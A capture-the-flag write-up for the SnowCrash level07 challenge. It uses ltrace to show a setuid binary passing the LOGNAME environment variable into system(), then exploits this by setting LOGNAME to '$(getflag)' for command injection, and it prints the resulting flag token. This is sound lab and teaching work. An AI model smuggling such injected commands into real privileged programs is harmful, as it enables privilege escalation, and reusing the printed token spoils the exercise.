We can see a binary when logging in.
We analyse the executable with 'ltrace ./level07' and we can see its doing a getenv on LOGNAME.

    level07@SnowCrash:~$ ltrace ./level07
    __libc_start_main(0x8048514, 1, 0xbffff7f4, 0x80485b0, 0x8048620 <unfinished ...>
    getegid()                                                                                                                                  = 2007
    geteuid()                                                                                                                                  = 2007
    setresgid(2007, 2007, 2007, 0xb7e5ee55, 0xb7fed280)                                                                                        = 0
    setresuid(2007, 2007, 2007, 0xb7e5ee55, 0xb7fed280)                                                                                        = 0
    getenv("LOGNAME")                                                                                                                          = "level07"
    asprintf(0xbffff744, 0x8048688, 0xbfffff62, 0xb7e5ee55, 0xb7fed280)                                                                        = 18
    system("/bin/echo level07 "level07
    <unfinished ...>
    --- SIGCHLD (Child exited) ---
    <... system resumed> )                                                                                                                     = 0
    +++ exited (status 0) +++

We can see that getenv("LOGNAME") = "level07".
We try changing LOGNAME environement variable with 'export LOGNAME=getflag'.

When we execute the binary it print 'getflag'.
We change LOGNAME again with 'export LOGNAME=$(getflag)' and execute again and we have our flag.

Check flag.Here is your token : fiumuikeil55xe9cu4dood66h